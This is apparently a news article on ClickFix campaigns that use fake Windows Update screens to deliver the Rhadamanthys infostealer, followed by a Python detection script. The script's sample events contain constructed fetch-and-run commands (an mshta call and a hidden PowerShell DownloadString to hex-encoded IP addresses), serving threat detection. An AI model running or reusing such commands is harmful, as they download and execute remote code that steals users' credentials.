Emerging Threats in Cybersecurity: The ClickFix Attack Trend
A notable surge in ClickFix attacks is currently raising alarms in the cybersecurity community, as attackers employ deceptive Windows update screens to lure victims into unwittingly downloading infostealer malware. This sophisticated social engineering tactic exploits users’ trust, prompting them to execute harmful commands on their own devices under the guise of necessary system updates.
ClickFix has become the predominant method for initial access among cybercriminals, as reported by Microsoft. Over the past year, both state-sponsored actors and organized crime groups have increasingly utilized this technique to distribute malware.
Recent analyses by Huntress security experts, Ben Folland and Anna Pham, reveal a shift in tactics, moving away from traditional robot-check prompts to “highly convincing” fake Windows update screens. This evolution in strategy highlights the attackers’ adaptability and the growing sophistication of their methods.
In a particularly innovative twist, these cyber adversaries are leveraging a steganographic loader to deliver infostealing malware, such as Rhadamanthys. This technique encodes malicious code within the pixel data of PNG images, utilizing specific color channels to reconstruct and decrypt the malware directly in memory. Such methods not only enhance the stealth of the payloads but also help them evade detection by signature-based security systems.
Between September 29 and October 30, 2025, Huntress investigated 76 incidents linked to this campaign, affecting a diverse array of organizations across the US, EMEA, and APJ regions. One notable incident involved traffic from the IP address 141.98.80[.]175, which security professionals are advised to monitor closely.
A common thread among these incidents is the first-stage payload, which references a URL featuring a hex-encoded second octet, ultimately leading to the steganographic loader. Victims typically initiate the attack by visiting a malicious website that triggers their browsers to enter full-screen mode, displaying a blue Windows Update screen reminiscent of legitimate system notifications.
If users succumb to the ruse, they are prompted to install a “critical security update” through the familiar ClickFix pattern. This involves opening the Run prompt (Win+R), followed by pasting and executing the malicious command.
This command initiates a multi-stage execution chain, commencing with an mshta.exe command that contains a URL with a hex-encoded IP address. This process runs PowerShell code that dynamically decrypts and reflectively loads a .NET assembly, which subsequently deploys another .NET payload—a steganographic loader that extracts Donut-packed shellcode concealed within the pixel data of PNG images. Ultimately, these ClickFix lures lead to the installation of Rhadamanthys infostealing malware, which stealthily captures users’ login credentials.
While the identity of the perpetrators remains unknown, Huntress researchers have noted that comments within the source code of the Windows Update lure site are written in Russian. Their analysis was conducted both before and after the Operation Endgame law enforcement actions announced on November 13, which targeted the infrastructure supporting Rhadamanthys.
As of November 19, multiple active domains continue to host the Windows Update lure page associated with the Rhadamanthys campaign. All these lures reference the same hex-encoded URL structure previously linked to the malware’s deployment, although it appears that the payload is no longer being actively hosted.
Organizations can bolster their defenses against ClickFix attacks by implementing measures such as blocking access to the Windows Run box and educating employees about the ClickFix technique. It is crucial to emphasize that legitimate CAPTCHA or Windows Update prompts will never require users to paste and execute commands. Furthermore, employing endpoint detection and response tools can help monitor for suspicious activities, such as explorer.exe spawning mshta.exe or PowerShell processes with unexpected command lines.
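The two detection hooks the article names, the hex-encoded IP literal in the first-stage URL and explorer.exe spawning mshta.exe or PowerShell, can be turned into a small hunting script. The following Python is an added example written for this page; it is not code from Huntress, Microsoft or the original article. It assumes Sysmon Event ID 1-style field names (ParentImage, Image, CommandLine), inet_aton-style IPv4 parsing (decimal or 0x-hex octets), and the four process-creation events embedded below are constructed for illustration; the hex forms of the IoC IP are derived from the address given in the article, not observed command lines.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are illustrative only; the command lines and paths are made up.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     # hex-encoded second octet of the article's IoC (constructed URL path)
     "CommandLine": "mshta http://141.0x62.80.175/update"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # every octet hex-encoded (constructed)
     "CommandLine": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadString('http://0x8d.0x62.0x50.0xaf/stage')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\sync.ps1"},   # benign admin script
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Hosts pulled from http(s) URLs inside a command line.
URL_HOST_RE = re.compile(r"https?://([^/\s:'\"]+)", re.IGNORECASE)
# One IPv4 part in inet_aton style: decimal digits or 0x-prefixed hex.
OCTET_RE = re.compile(r"^(?:0x[0-9a-f]+|\d+)$", re.IGNORECASE)

# Children that explorer.exe launches when a user pastes into the Run box.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe", "pwsh.exe"}


def normalize_ipv4_literal(host: str):
    """Return the dotted-decimal form of a four-part IPv4 literal whose parts
    may be decimal or 0x-hex (as inet_aton accepts them), or None if the host
    is not such a literal."""
    parts = host.split(".")
    if len(parts) != 4:
        return None
    values = []
    for part in parts:
        if not OCTET_RE.match(part):
            return None
        value = int(part, 16) if part.lower().startswith("0x") else int(part, 10)
        if value > 255:
            return None
        values.append(value)
    return ".".join(str(v) for v in values)


def has_hex_octet(host: str) -> bool:
    """True if any dotted part of the host uses a 0x hex prefix."""
    return any(p.lower().startswith("0x") for p in host.split("."))


def analyze_event(event: dict) -> list:
    """Return a list of finding strings for a single process-creation event."""
    findings = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")

    # Hook 1: explorer.exe directly spawning mshta/PowerShell (Run-box pattern).
    if parent == "explorer.exe" and child in SUSPICIOUS_CHILDREN:
        findings.append(f"explorer.exe spawned {child} (Run-box / ClickFix pattern)")

    # Hook 2: URL whose host is an IP literal, especially with hex octets.
    for host in URL_HOST_RE.findall(cmd):
        normalized = normalize_ipv4_literal(host)
        if normalized and has_hex_octet(host):
            findings.append(f"hex-encoded IP literal {host} -> {normalized}")
        elif normalized:
            findings.append(f"raw IP literal in URL: {normalized}")
    return findings


def scan(events: list) -> list:
    """Run analyze_event over every event; yields (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in analyze_event(ev)]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

The normalized address is what you match against blocklists and the article's IoC; matching on the raw string would miss every alternate spelling of the same host. In production the events would come from a SIEM or EDR export rather than the inline list, and the hex-literal check should also be applied to the first-stage URL embedded in the mshta argument, not only to PowerShell command lines.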
New ClickFix attacks use fake Windows Updates to swipe creds